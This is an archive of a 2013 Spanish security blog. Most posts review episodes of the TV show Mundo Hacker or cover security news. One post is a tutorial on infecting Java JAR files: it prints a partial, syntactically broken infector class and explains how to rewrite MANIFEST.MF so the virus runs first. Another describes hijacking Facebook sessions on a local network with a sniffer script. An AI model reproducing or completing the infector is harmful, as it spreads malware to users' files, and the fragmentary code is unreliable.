viernes, abril 12, 2013

Análisis Mundo Hacker - Seguridad en Dispositivos Moviles

Los smartphones han intensificado la actividad digital, especialmente en lo que se refiere a la utilización de las redes sociales.

Ya en la Noconname de 2011, Sebastián Guerrero nos advertía a los asistentes de los peligros que entrañan los dispositivos móviles aunque en su caso fue un demo mas centrada en Android, y su sistema de permisos, analizando un malware que provenía de una appstore de dudosa seguridad.

La temática en si es muy buena, y da mucho juego. La pena es el limite que establece no entrar mucho en harina, ya que los usuarios noveles dejarían de ver el programa. La máxima sigue siendo concienciacion sin alarmismo, y en esa linea se le auguran buenos resultados de audiencia. Lo que eche en falta es hablar un poco de aplicaciones software legitimo que bloquean móviles con sistemas antirrobo, antivirus , bloqueadores de SIM mediante IMEI... una especie de consejos útiles.

También se quedo corto el tema que tratan sobre seguridad en BYOD ( en castellano "trae tu propio dispositivo") y como afecta en la seguridad perimetral de las empresas.

Vamos con el análisis de los protagonistas de esta semana:

Antonio: Bien, sin contemplaciones, aunque debería haber estado mas explicito con el usuario que trollearon. Un nuevo "Momento Leila", algún día tendrán un percance xD

Monica: Muy bien durante todo el programa, pero no me convenció la explicación sobre "instalar programas y antivirus". Si es cosa del guion, dales una colleja a los guionistas.

@jacin_Grijalba: Se lo paso de lujo con su demo, me gusto la facilidad con la que explica. Amigable y tecnicamente correcto.

@EnriqueITE: Joven aunque sobradamente preparado. Bien en el dificil juego de la camara, bien lo de los permisos en sistemas moviles,sin paranoias ni oscurantismos.

WTF de la semana: En el montaje de imágenes ¿Que dispositivo no aparece? ¿Que marca gana por goleada en las apariciones?

Por aportar, algo al programa, os presento a los que no lo conozcáis el sistema avast! Mobile Security, que consta de las siguiente características:

  • componente Anti-Theft
  • bloquear llamadas o SMS de números no deseados
  • contador del Flujo de Datos
  • opción SiteCorrect 
  • firewall en dispositivos rooteados
  • El escudo Web que avisa carga una URL infectada por malware
  • Analisis de aplicaciones instaladas

miércoles, abril 10, 2013

Cuerpos de seguridad Vs Hackers

El Grupo de Delitos Telemáticos fue creado para investigar, dentro de la Unidad Central Operativa de la Guardia Civil, todos aquellos delitos que se cometen a través de Internet. Entre las funciones de la Brigada de Investigación Tecnológica está la de velar por la seguridad de los internautas y de los ciudadanos en general.

Tengo que reconocer cierta ventaja al realizar esta entrada. Hace unos días hubo un debate  o mas bien mesa redonda en la cual había ciertos momentos de interesantes puntos objetivos. Un miembro del puerto de GDT, explicaba entre otras cosas que la legalidad en las actuaciones es un mantra en su trabajo, y que ello en ocasiones les condiciona a estar un paso por detrás en defensa de los intereses y la seguridad y defensa de los ciudadanos.

En este punto, tiene mas razón que un santo. Cualquier abogado defensor sabe buscar cualquier escondrijo legal para poder alegar un defecto de forma, por ejemplo. Si la actuación no se produce acorde con la legalidad, puede que las pruebas obtenidas no sean validas, incluso tengas que indemnizar al delincuente.

Hace ya unos años me plantee el acceso a alguno de los cuerpos de seguridad del estado, en su sección de investigación telematica. Amen de que primero debes pertenecer al cuerpo y luego especializarte en dicho cometido, no me gustaba la idea de tener las manos tan atadas. Es muy dado a la demagogia el tema de la pornografía infantil. Pues eso. Yo me veo en un registro que hallas pornografía infantil en casa de un investigado y no llega al habeas corpus, porque no se si podrían aguantar chafarle un monitor en la cabeza.

Ahora vienen los palos. Como en todos los cuerpos y fuerzas de seguridad del estado, los ascensos generalmente suelen ser por rango mas que por merito. Eso lleva que sea muy dificil el acceso y ademas sea muy difícil la promoción profesional, cosa que limita mucho la productividad laboral de la gente brillante que esta en esos cuerpos (si hay gente brillante).

El palo mas gordo es contra la legislación vigente. La pornografía, el trafico de drogas-armas.humanos,  los sicarios... son delitos, y es lógico. ¿Porque no se persiguen la apología de la bullimia y la anorexia, las autolesiones o las incitaciones al odio/racismo/violencia? No entiendo que sean impunes, y ademas sean consciente de ellos.

Realmente ahora ya no existe una lucha encubierta entre Cuerpos de seguridad Vs Hackers como hace años, mas que nada porque ellos entienden que en muchas ocasiones son una ayuda inestimable, e incluso participan de manera conjunta en conferencias y charlas. Aun así quedan reticencias, sobre todo de gente de la vieja escuela en ambos ¿bandos?

Por lo demás  un abrazo a todos los amigos de ambos cuerpos, y enhorabuena y gracias por el trabajo que realizáis a diario.....

viernes, abril 05, 2013

Analisis Mundo hacker Episodio 3 - Ciberguerra


Guerra informáticaguerra digital o ciberguerra, en inglés cyberwar, se refiere al desplazamiento de un conflicto, en principio de carácter bélico, que toma el ciberespacio y las tecnologías de la información como escenario principal, en lugar de los campos de batalla convencionales.
Anoche, fielmente me enganche a Mundo Hacker de nuevo. La verdad es que la rutina me apasiona. Terminar el trabajo, cena ligera y mis aperitivos para ver el programa. Claro esta con mi netbook para twittear y comentar cosas.

El capitulo de ayer me encanto. El enfoque de un tema tan sensible como la ciberguerra y los ataques a infraestructuras criticas requiere un punto de seriedad y profesionalidad que es muy fácil caer en alarmismos o por contra en vanalidades, por la estrechez del camino para tratarlos de forma entendible para el gran publico. 

Pero vamos con el análisis de los diferentes protagonistas:

@chemaalonso: Tengo que reconocer que cuando lo conoci no me cayo bien. Yo tenia la extraña teoria de que una persona que te engaña no te puede hacer sonreir y ademas conseguir que le des las gracias. Asi es Chema, el mentalista del hacking en España. Kevin Mitnick comento en muchas ocasiones que pocas veces usaba sus profundos conocimientos sobre hacking. No le hacia falta. Chema para mi es un genio, pero no tiene la necesidad de demostrartelo en cada momento. Solo cuando el quiere. 

Eso si, me hubiera gustado que hubiera seguido desarrollando esa idea de la importante diferenciación entre servicios que solo deben verse en una Intranet, y los que deben salir a Internet. Por otro lado, ¿Bing el mejor buscador? Los de Yandex no pensaran igual que tu XD

Ángel Ochoa : Me convence desde los comienzos de mundo hacker, ademas le da ese puntito entretenido cuando la ocasión lo requiere. Suerte en la HackMeeting !!

monivalle: Lo comente en la pasada y sigue In crescendo. Chema también puso de su parte en la parte de la demo, pero condujo muy bien.

@Antonio: Muy bien cambiando el rol en un programa eminentemente mas sobrio. Eso si no me gusto el denominar a Reino Unido como UK. Los que somos catetos en el idioma de Shakespeare .... ;) Por otra parte, hablando con Arbor no dejan del todo claro diferencia entre dos y ddos.....

Vamos ahora con el WTF de la semana: ¿Os habéis fijado que en el gran montaje que ha hecho el equipo de realización, se les ha colado una imagen repetida del Keygen.EXE con el  error aplicacion Win32 no valida?


jueves, abril 04, 2013

Diseño web: Precio Estimado Vs Precio Presupuestado Vs Precio Real

El acceso al diseño web es de fácil  y cualquier persona puede obtener y aprender a diseñar un sitio web. Un diseñador profesional no recibirá la página construida sino que también se asegurará de que el sitio web funciona perfectamente. El diseño, el tema, los colores, el contenido .etc. Lo importante es que toda la apariencia de la página web debe ser agradable y armónica.
Esta entrada viene precedida por un Tweet que publique haciendo referencia a la cantidad de entidades publicas, oficiales o incluso gubernamentales que vienen haciendo uso de varios CMS como Joomla, Wordpress o Drupal para la gestión de sus sitios web. En principio la iniciativa no me parece errónea. Esta elección denota un interés por la agilidad en la gestión de la información  una cierta inquietud por las nuevas tecnologías y manejo básico de las TIC.

En si yo no considero que un script en PHP como lo están en la mayoría de los casos sea mas inseguro que una programación a medida, sino es la gestión de la configuración de ese script, y la concienciacion en la seguridad la parte mas compleja para ellos. Muchas veces comienzan a plagar su sistema de plugins con mayor o menor necesidad en su uso, de sitios o desarrolladores no confiables, y en muchos casos de forma ilícita al saltarse cualquier licencia de uso o de pago.

He realizado una mini encuesta "a pie de urna" y las respuestas de los diferentes actores implicados me ha dejado helado. Un desarrollo Web de un portal corriendo un Wordpress por esta zona ronda los 2000 euros (cifra orientativa). Bien, eso implica que desgrabando gastos salarios y demas, voy a hacer un pelin de demagogia y simplismo en este punto. Voy a dejar limpios 1000 europeos. A un desarrollador medianamente avispado, la instalación e implementacion de un CMS, voy a echarle una mañana, 5 horas. Otra mañana con el Photoshop+ Illutrator, que si diseña que si vectoriza-rasteriza-maqueta. Son 5 horas mas. Hagamos ahora la cuenta de la vieja:

  • 1000 Euros / 10 horas = 100 Euros la hora de trabajo.
Bajando al mundo real ahora desde nuestra simulación, y siendo un poco mas objetivos, me sigue pareciendo una estafa.

Supongamos ahora que compro este argumento y lo veo normal. ¿Cuantas pymes pueden hacer este desembolso para publicitar su negocio? Pocas, estas tendrán que seguir mendigando en servicios como el de paginas amarillas....

La mayoría de las ocasiones, estas empresas son piratas en el sector, y las compañías serias realmente salen perjudicadas y los clientes reales o potenciales también.

Hace tiempo en una conferencia uno de estos "gurus" dijo que ellos tenían el problema de "los sobrinos que hacen webs por 200 Euros", yo le dije que yo he hecho alguna por una buena cena, que cuando quiera le hacemos una auditoria y comparamos :)


viernes, marzo 22, 2013

Dia 114 - Mundo Hacker, Episodio II , hacking wifi

En este capitulo, el equipo de Mundo Hacker nos desvelan las inseguridades de las redes inalámbricas.


Sigo en la idea de comentar cada episodio de esta saga, no ya por el mero hecho de que sean como de la familia, sino también porque se esta convirtiendo en un fenómeno mediático, con partidarios y detractores.
Por hacer una mera introducción, he visto mucho comentario de enteradillos en la red sobre el nivel del programa, que si las redes wifi que si los cifrados, y un largo etcétera. Para ellos quiero comentar, que en los créditos y subtítulos del programa indica explícitamente que se omiten algunos pasos de la misma por seguridad (mas bien para que cientos de melones no se pongan a trastear con cosas que no entienden) y quiero recordaos que este programa no solo lo ven hackers y gurus, también gente de a pie, o mi padre inclusive.

Pero vayamos ya con el análisis:

@yadox: Yo reconozco abiertamente, es un autentico crack. Un sysadmin amigo me dijo una vez que los auténticos hackers que están en la élite tienen una característica única, que siempre sonríen  Se dan cuenta que se divierten con lo que hacen y no solo te lo enseñan, sino que te hacen participes de sus ilusiones. También es cierto que es un terreno que se encuentra cómodo, quizás en posteriores capítulos le veamos mas en materia, pero bien, en su linea de hacker mediático.

Leila: Ni elegido a idea la victima les sale tan de cara. Ha representado, el desinterés, el desconocimiento y la pereza por la atención a su seguridad y privacidad. Este mal endémico en nuestra sociedad esta muy de moda por caso recientes en los medios de comunicación, pero se sigue sin darle la importancia que lo requiere. Una lastima Leila, ojala me equivoque pero no sera el ultimo susto a tu privacidad, ojala me equivoque. Ahora, mejor tu de victima, porque si llegas a medir dos metros y pesado 140 kilos, hubiera sido mas dificil explicarte que acaban de trollearte :D

@monicavalle: Mejora por momentos. Bien en la conducción, bien en el analisis, y bien en la mediación  Yago hizo de poli malo, pero ella puso cara a la serenidad en el #momentoLeila. Gran periodista, a seguir su carrera....

Antonio: Me voy a tomar una licencia. Creo que se sumió mucho al guion establecido, y en momentos creo que le hubiera gustado meterse mas en harina. Al contrario que Monica si que tiene un perfil técnico, y a veces lo deja patente. Bien como siempre.

Jesus: No tengo tu perfil, pero me lo imagino. En las redes sociales no ha gustado demasiado su seguridad en si mismo, pero es algo que enfatiza con su comunicación no verbal, por lo que es una persona extremadamente segura en sus explicaciones. Tipifico su clase practica en un ataque WEP, quizas yo hubiera  hecho algo de hincapié en que WPA ya tiene diccionarios de claves por defecto, o que a pesar de que el lo hizo de modo manual existen ya scripts que te automatizan todo, es decir, hacking wireless para dummies.

Por cierto, en unos minutos fuimos Trending Topic a nivel de España, lo que es loable. Esta visto que hasta que no liemos alguna gorda no tendremos el suficiente bombo y platillo, pero bueno.

El WTF: Fijaos en la central de Mundo Hacker, si encontrais el libro de 2006:



Y en el próximo Chema Alonso y la ciberguerra, tiene que ser apasionante.






viernes, marzo 15, 2013

Dia 113 - MundoHacker en Discovey, hackers mediaticos

Ayer 14 de Marzo, se estrenaba a las 00.20 en el canal Discovery Channel. Desciframos cosas que no se vieron.

En primer lugar quiero dar la enhorabuena a todo el equipo del programa, por el trabajo y por el esfuerzo. Los que os seguimos desde la epoca de la radio sabemos todo lo que habeis pasado para llegar hasta aqui, por ello debéis disfrutar mas todavía de este momento. Pero como ya me conocéis que no doy nada gratis, empecemos con la critica xD

@YJesus: En su linea, es un valor seguro por su experiencia,y claridad cuando explica buscando que el que le escucha llegue a una conclusión. Lo veo mucho en la linea mediática de Chema, que ademas de ser un fenómeno es genial y a su vez mezcla dosis de humor y pedagogía a partes iguales. Bien Yago, sin duda fue uno de los puntos fuertes del programa.

@lawwait: Me quedo con la idea de que es menos mediático  pero aun así sabe adoptar el rol que se le imponga. Yo se que esta mas cómodo en eventos o mesas redondas, pero aun así cumple con creces con las expectativas del programa de ayer. Me lo confirmaras, pero yo te vi de menos a mas, con un final muy bueno en tus intervenciones. ¿nervios? ¿Monica? xD

@monivalle: Lo reconozco, no la conocía  Viendo su curriculum, a la par que me impresiona, me pregunto que hace con esta gentuza xD. Ahora en serio, me seria facil basar la critica en el aspecto, como hacia alguno ayer en Twitter y Facebok, pero no. Me gusto el rol, parecido al de Antonio, la del usuario común que ve el programa. A veces caemos en el error de pensar que solo hackers, expertos o frikis ven el programa. Ayer estuve haciendo trolling para que vieran el programa varios compis, y no diferencian entre ipconfig e ifconfig. Por otra parte y si me lees Monica, cuidado con los espacios....

 Antonio Ramos. Es la parte visible y activa de Mundo Hacker. Yo no concibo este proyecto sin su carácter  saber estar y conducción. Quizás adopta una fase menos participativa en favor de Monica, pero deja la estela cuando se ponen en común.

Para el proximo programa se que vuelve "el otro" Yago, y alguna cosilla que he oido entre bambalinas. Pero ¿volvera el gran Dimitri? ¿veremos el #ataquetipobankia?

También tenemos parte de culpa los televidentes. Sin ver las cuotas de share, me ilusionaba la idea de un TT aunque fuera momentaneo, pero monitorizando fue inviable. El niño ese, euroclub, y demas monsergas.
No tenemos poder de movilizacion. Vaya hackers de mierda somos xD

Un saludo enorme para todos

miércoles, enero 23, 2013

Dia 112 - Deface a Google marroqui

La web google.co.ma ha sido atacado por un grupo de hackers denominado PAKbugs. Las ultimas informaciones concluyen que se habria producido un ataque hijack (secuestro).

Tomando en la web de Symantec por ejemplo, leemos que un hijack es el tipo de ataque donde un intruso toma control de una sesión de comunicación existente entre un servidor y un usuario legítimo que se ha conectado y autenticado con el servidor. El intruso puede supervisar la sesión de manera pasiva al registrar la transferencia de información confidencial, como contraseñas y códigos. Otro tipo de secuestro implica un ataque activo efectuado al forzar la desconexión del usuario (con ataque de negación de servicio) y tomar control de la sesión. El intruso comienza a actuar como el usuario, ejecutando comandos y enviando información al servidor.

Ha sido publicado en el portal especializado en acoger defeaces zone-h, del cual podeis ver un mirror aqui:

https://www.zone-h.org/mirror/id/19094784 

Lo que no conozcáis el portal, os cuento un poco como los usuarios categorizan sus defaces:


  • H - Deface a la pagina inicial 
  • M - Deface Masivo
  • R - Redefacement 
  • L - IP address location 
  • * - Deface especial, debido a la importancia o relevancia del mismo
Estos hackers tienen bastantes estrellas, por lo que como podéis ver el nivel es bastante alto...

Ademas, no es la primera vez que esto ocurre, recientemente, en Noviembre de 2012, Yahoo y Google en Rumania fueron fruto de ataques similares, mediante el envenenamiento de DNS. Os dejo un grafico bastante explicativo de este tipo de tecnica, podeis encontrar mucha informacion al respecto en la red.


viernes, enero 18, 2013

Dia 111 - Nuevo Java 0 day por 5000 $

Varios portales especializados han recomendado deshabilitar la maquina virtual de Java debido a dos vulnerabilidades de día 0, las cuales todavía no han sido corregidas.

En el CVE-2013-0422, se especifica que :
Esta alerta de seguridad se ocupa de cuestiones de seguridad CVE-2013-0422 y otra vulnerabilidad que afecta a ejecutar en un navegador web Java. Estas vulnerabilidades no son aplicables a Java que se ejecuta en servidores autónomos, aplicaciones de escritorio o aplicaciones Java embebido Java. Tampoco afecta a Oracle software basado en servidor
El problema es que Java esta presenta en mas de 3 billones de equipos, los cuales muchos sin tener ni idea. Según un informe de krebsonsecurity, un experto en seguridad publico este mensaje:
“New Java 0day, selling to 2 people, 5k$ per person.
And you thought Java had epically failed when the last 0day came out. I lol’d. The best part is even-though java has failed once again and let users get compromised… guess what? I think you know what I’m going to say… there is yet another vulnerability in the latest version of java 7. I will not go into any details except with seriously interested buyers.
El gobierno de EEUU, Firefox y otras tantas compañías han tomado medidas para paliar este sin fin de tropelías en una compañía que desde la absorción de Sun, no ha dejado de sobresaltarnos. No muchos sitios requieren ya Java, y todavía resiste software de escritorio que lo utilizar como medio de comunicación con el sistema.

En mi caso ademas de no utilizarlo, aprendí del amigo Yago Jesús  que el NoScript es parte de mi vida. La pregunta realmente que se me plantea en este termino es.. ¿Realmente podemos vivir sin Java?

http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html

lunes, enero 07, 2013

Dia 110 - Como hackear Facebook en redes locales

En este sensacionalista post, para todos los que tenéis ese afan por conocer llamado Hacking, vemos la sencillez de robar una sesión de Facebook con cuatro herramientas libres y un poco de ingenio.

En el video, el ponente usa la distribución de Linux Backtrack Linux, enfocada y especializada en muchos campos de la Seguridad Informatica. Como comentario de la version y la distro decir que la Backtrack 5 R3 fue lanzada el 13 de Agosto del pasado año.

La técnica que va a usar en una técnica en principio sencilla y limpia, conocida como Hijacking. Dicha técnica consiste en secuestrar una sesión que el usuario legitimo ha abierto previamente, y hacérnosla propia. En lenguajes de programación, tenemos dos mecanismos para  la gestión de la información de usuario, las cookies y las sesiones. Para no alargarme os dejo un link que explica esto mismo, por ejemplo en PHP :

Cookies y sesiones en PHP

Este tipos de ataques dueron muy populares hace no mucho tiempo cuando se lanzaba la aplicacion FireSheep. En este caso el autor va a utilizar Greasemonkey y un script para el mismo, anclados al navegador Firefox. Bien. lo primero que nos encontramos es que nos lleva a los foros oficiales de Backtrack para descargarnos el Passsniffer.sh, el cual merece la pena leer para comprender su función (como deshabilita IPTABLES, como hace un pequeño MITM automatico .... )

Descarga Passsniffer.sh

Solo como comentario, y para no destriparlos el final de la película  fijaos en la potencia de la herramienta de monitoreo Wireshark(por muchos conocido ya desde su padre Ethereal)




Recomendaciones finales:


  • Si es posible no usar ordenadores públicos para uso privado.
  • Siempre cerrar sesión de nuestras cuentas, no dejarla abierta.
  • Siempre marcar la casilla de que no recuerde nuestra sesión.
  • Siempre decirle al navegador que no recuerde nuestras contraseñas.
  • Usar técnicas como la navegación privada (disponible por ejemplo en Chrome y Firefox.)




domingo, enero 06, 2013

Dia 109 - Zero day en PGP Whole Disk Encryption

Seguimos sin levantar cabeza. Symantec es uno de los buques insignia del desarrollo de aplicaciones de seguridad, pesadas, caras e inservibles. Hace no mucho sufrieron sucesivos ataques a sus soluciones y fueron expuestas lineas clave de su codigo fuente. Ahora Sufren una vulnerabilidad Zero Day en su sistema de cifrado para PGP.

Como reza su web, PGP Whole Disk Encryption de Symantec brinda a las organizaciones una completa solución de cifrado de disco de alto rendimiento para todos los datos (archivos de usuario, archivos de intercambio, archivos del sistema, archivos ocultos, etc.) en equipos de escritorio, equipos portátiles y soportes extraíbles. Este software de cifrado de disco completo protege los datos contra el acceso no autorizado, ya que brinda protección eficaz para datos de los clientes, partners y propiedad intelectual.

Los sistemas protegidos pueden administrarse de manera centralizada con PGP Universal Server, lo que simplifica la implementación, la creación y distribución de políticas, y la elaboración de informes. La version afectada, Symantec PGP Desktop 10.2.0 Build 2599

El pgpwded.sys incluido en el kernel, incluye una vulnerabilidad, según publico el 25 de Diciembre Nikita Tarakanov en su Twitter. Sin embargo, Symantec confirmo que la explotación de la amenaza seria limitada ya que solo versiones de Windows XP y Windows 2003 Server serian vulnerables ademas de que la vulnerabilidad solo seria explotaba en modo ON SITE.

En principio tienen previsto lanzar el parche que soluciona esta vulnerabilidad en Febrero. Os dejo los detalles publicados en Pastebin:

http://pastebin.com/pEBSjsmC 

Ademas, es interesante echarle un ojo a los papers oficiales de Symantec:

http://www.symantec.com/content/en/us/enterprise/fact_sheets/b-pgp_whole_disk_encryption_DS_21064414.en-us.pdf

http://www.symantec.com/content/en/us/enterprise/white_papers/b-pgp_how_wholedisk_encryption_works_WP_21158817.en-us.pdf

Como nota interesante ademas, os dejo que el Gobierno holandés publica directrices para la divulgación responsable de vulnerabilidades. Mas que nada porque a veces, los protocolos, y las normas de seguridad de publican , fallan:

http://news.softpedia.es/El-Gobierno-holandes-publica-directrices-para-la-divulgacion-responsable-de-vulnerabilidades-318757.html

sábado, enero 05, 2013

Dia 108 - Spam en Blogger, Wordpress y similares

En los inicios de Internet no había spam. No tardó en aparecer, pero al principio era poco y no suponía muchas molestias. Por desgracia, el volumen de spam ha crecido, junto con las "arañas" de los spammers, y, lo que es peor, se ha vuelto más sofisticado tecnológicamente, a fin de cruzar de manera automática la barrera impuesta por los filtros antispam. Una estrategia cada vez más habitual en el spam es usar capas de imágenes.

Hoy he habilitado los comentarios de forma abierta. Quiero decir con esto que no solo restringo los comentarios a usuarios de Google sino que también cualquier usuarios con OpenID (Livejournal, Wordpress, AIM...) puede realizar comentarios en mi blog. Modo test ON

Realmente no me preocupan los comentarios en si mismos, ya que este blog mio tiene una difusión muy acotada e incluso me atrevería a decir diversificada, sino el maldito Spam. Voy a daros unos tips o truquitos para evitar estos males si usáis plataformas cerradas o no os quieres matar mucho la cabeza con configuración es avanzadas y mantener vuestros sitios libres de esta plaga. Aunque como decia un colega mio, "las visitas siempre son visitas".

Primero debemos tener claro que el spam es una plaga muy evolucionada y que muchos bots pueden saltarse las restricciones con suma facilidad. En los sistemas tipo blog, en los cuales la comunicación es unidireccional, la única posibilidad de entrada es mediante los comentarios.

Bien Google, como comento arriba establece cuatro niveles de filtrado, que podeis modificar desde Configuracion | Entradas y comentarios. Los cuatros niveles son:


  • Cualquier usuario: Literal, cualquiera sin restricciones, inclusive anonimos 
  • Usuario Registrado: Filtra los anonimos, solo usuarios con OpenID (Livejournal, Wordpress, AIM...).
  • Cuentas de Google: Cuentas de usuarios de Google. 
  • Miembros del blog: Solo los autores y/o componentes del mismo 


Ademas, Blogger nos proporciona el filtrado temporal, con las opciones a veces, siempre o nunca. La primera establece un filtro temporal para decidir a antigüedad que debe tener la entrada antes de que necesite moderación. Siempre y nunca, lo que dicen. El problema de nunca es que es un nido de spammers, trolls y demas fauna, y el problema de siempre es que tu correo va a echar humo.

La opción del captcha puede ser otro paso para evitar el spam, pero no es 100 % fiable. Podemos configurarla en el mismo menú. Las plataformas con administración avanzada como foros, cms y blogs mas potentes permiten el uso de plugins, y addons para gestionar y filtrar los comentarios, pero recordad que cuantos mas chismes instalemos, mas al tanto debemos estar para no comprometer la seguridad de nuestro site.

El tiempo me confirmara si la opción que he elegido no es la mas recomendable, pero siempre puede cambiarse.

viernes, enero 04, 2013

Dia 107 - Comparativa de conferencias Hacker

El Instituto Nacional de Tecnologías de la Comunicación (INTECO) ha catalogado un troyano para la plataforma Windows, llamado Bublik.B, que se hace pasar por una actualización del sistema operativo con el fin de que sea ejecutado por el usuario. 

Lo cierto es que me paso factura el no poder asistir a la NoconName, y esta noticia me ha alegrado el día.
Os anunciamos que el día 14 de enero, lunes, se abrirá el formulario de registro para adquirir vuestras entradas para la siguiente edición de Rooted CON, la cuarta, cuyas fechas serán 7, 8 y 9 de marzo. Os recomendamos que *reviséis con calma las condiciones generales* puesto que hemos añadido una serie de restricciones para la adquisición de entradas con descuento de estudiante. En concreto, a partir de este año solamente aceptaremos registros como estudiante de personas que NO estén en activo en forma alguna y que acrediten su condición de estudiante con la matrícula vigente para este curso (ojo, de ninguna manera vamos a aceptar carnets de estudiante). Y, sobre todo, menos todavía vamos a emitir facturas a gente que se haya registrado como estudiante.
Hoy me quiero centrar en un análisis de dichas conferencias a nivel nacional No he tenido la suerte de salir fuera de España. No voy a exponer las maravillas de estas conferencias, ni el buen ambiente que reina, ni lo que te alegra ver a los colegas. Voy a atacarles categóricamente, comparándolas con las conferencias SEO y SocialMedia. No son tópicos, pero bien es real que existen muchas excepciones en ambas direcciones.

 Para darle originalidad, va a modo de comparativa:


  • Las conferencias de seguridad acuden empresas de todos los ámbitos, muchas con la única intención de participar del conocimiento. Las de marketing online - SEO, acuden empresas de un solo ámbito, muchas con la única intención de vender o sacar clientes.
  • Las conferencias de seguridad puedes encontrar gente brillante que te hable con una sencillez como el que come bizcochos. En las de marketing online - SEO, hay bizcochos :)
  • El nivel de féminas en una Con, es de una por cada 500 (en términos cualitativos una por cada 10 m2). El nivel masculino en  las de marketing online - SEO, es de un hombre por cada 7 mujeres. (en términos cualitativos una por cada 3 m2).
  • En el nivel de comida/bebida, estableceremos un empate técnico (las conchas Codan son bastante desequilibrantes)
  • El enfoque de la conferencias de seguridad es el aprendizaje y el conocimiento, En las de marketing online - SEO el mantra es la venta.
  • En las de marketing online - SEO, los hackers con unos frikis, unos desalmados que estropean tu trabajo, unos trasnochadores granudos y sin vida social. Las conferencias de seguridad, los de marketing online son unos estirados.
  • En marketing online - SEO cualquier se llama a si mismo experto en. Un mantra del Hacker es que no te llamas a ti mismo, sino que te llaman los de mas Hacker.
  • Hay gente brillante en cualquiera de ellas. No podemos generalizar nunca.
  • El marketing online - SEO esta de moda y hay mucha demanda y trabajo. En España las empresas y profesionales siguen siguen prestar atencion a la seguridad.

¿Que pensáis vosotros? ¿Cual es vuestra experiencia?

jueves, enero 03, 2013

Dia 106 - Agujero de seguridad en camaras ip

Todo esto viene a raíz de un bug encontrado en las cámaras de vigilancia del fabricante TRENDNET, y que fue publicado por los amigos de RedesZone.

Para meternos en harina, podéis consultar el post original aquí:

http://www.redeszone.net/2012/01/25/enorme-agujero-de-seguridad-en-camaras-ip-de-trendnet/

El caso es que se descubre un modelo o varios de cámaras que permiten el acceso anónimo a la visualización de las imágenes que esas cámaras envían a la red. Las cámaras IP no solo permitían dicho acceso sino que la mayoría permitían la administración remota, por lo cual quedaban al antojo del usuario que las gestione.

Bueno, en principio podemos inclinarnos a pensar que TRENDNET actuo correctamente, ya que publico un parche para actualizar el firmware de dichas cámaras  y envió un mail a los usuarios instándoles al parcheo de las mismas.

¿FIN?

Pues no.  recientemente RedesZone me comunica que hay una cuenta de Twitter que no solo esta publicando los listados de cámaras vulnerables (via el mismo Twitter o via Pastebin)  sino que se ha construido un bot para no cansarse demasiado en estos menesteres. Como no había muchos followers, la difusión no era mucha y empezamos a gestionar las acciones pertinentes.

Vuelta a comunicar con TRENDNET, que se lavan las manos y nos derivan a TRENDNET global. Permanecemos a la espera. En tanto, el amigo Yago Jesús publica una entrada en SecuritybyDefault sobre la seguridad en camaras ip y dicha cuenta de Twitter, y aquí vino el problema. No por nada, sino porque son un portal experto, consumado, fiable, y por ende, con mucha difusión  ¿El resultado? Que dicha cuenta, dicha difusión, y dicha exposición multiplicadas por cinco.

Pero, claro la conclusión a la que llegamos es compleja. Tanto RedesZone como SecuritybyDefault hacen un papel fantástico en la difusión y alerta como hasta ahora. TRENDNET, cumple con su parte.

Sin embargo, los usuarios están expuestos, muchos no saben del problema que tienen, y por las imágenes que hemos podido ver, aunque lo supieran no podrían solventarlo (personas inexpertas, de avanzada edad....)

La pregunta se queda en el aire ¿De quien es la culpa y que puede hacer para solucionarlo?

miércoles, enero 02, 2013

Dia 106 - Como infectar un archivo JAR

Java es un potente lenguaje de programación desarrollado por Sun Microsystems, y que fue comprado por Oracle.Hace unos meses ya se publico una vulnerabilidad. 
Hoy te enseñamos como realizar una infección a un archivo de empaquetamiento de Java (.jar). 

Primeramente reseñar que el tutorial este es una recopilación de varias fuentes que podéis ver al final del mismo. Si queréis compartirlo, citar las fuentes originales que se han currado el trabajo. Un archivo JAR no es otra cosa que una compilación de varios archivos de JAVA. Para ello solo tenemos que introducir el comando correspondiente:

  java -jar archivo.jar

 Dentro tenemos el archivo manifest. Se usa para definir datos relativos a la extensión y al paquete. Es un archivo de metadatos llamado MANIFEST.MF y organizado con pares nombre-valor organizado en diferentes secciones. Si se pretende usar el archivo jar como ejecutable, el archivo de manifest debe especificar la clase principal de la aplicación. Esto como recordatorio, que también podéis encontrar info en esta web sobre los archivos JAR y en la documentacion oficial sobre JAVA de Oracle. Al lio. ¿Como funciona la infeccion? Realmente es muy sencillo, y es tan sencillo como listar los archivos .jar, buscar el manifest, buscal la clase principal y reemplazarla por nuesta clase infectada.

 Viendolo por pasos, un manifest:

  Manifest-Version: 1.0 
 Class-Path: 
 Main-Class: someClassName

 El codigo que compilaremos:

public class Infect { 

 public static void main ( String args [ ] ) { javax . swing . JOptionPane . showMessageDialog ( null, \"Hi this is Java Infect0r\nand welcome to Valhalla #3!\" ) ; 

 someClassName a = new someClassName ( ); 

 a . main ( args ) 

 CompileSourceInMemory b = new CompileSourceInMemory ( ) ; 

 try { b . main ( args ) ; 

 } catch ( Exception e ) { } 
 } 
 } 
 // create a temporary class with the name of the main class to prevent errors while compiling 

class someClassName 

public static void main ( String [ ] args ) 
{ System . out . println ( ) ;

} 

En esta clase se ejecuta el MainClass original ("someClassName"). Después de ejecutar el archivo original, se ejecuta el código del virus para infectar a otros archivos ("CompileSourceInMemory"). La segunda clase sólo se utiliza para evitar errores durante la compilación . Cuando el nuevo archivo se compila, el virus copia su propia clase y los nuevos archivos compilados en la carpeta temporal del fichero host, modifica el MANIFESTO.MF de modo que el Infect.class se ejecuta primero. Asi quedara nuestro manifest tras la infección:
Manifest-Version: 1.0
Class-Path:
Main-Class: Infect
Como conclusión, el autor relata la facilidad para escribir virus y malware usando el compilador de Java, creo que convendréis conmigo en que viene dado también por la potencia del lenguaje, y la difusión de un lenguaje potente pero peligroso.

Autor original del articulo:


R3s1stanc3 [vxnetw0rk]    December, 2012
r3s1stanc3@tormail.org - r3s1stanc3.virii.lu

martes, enero 01, 2013

Dia 105 - Otra vez Whatsapp

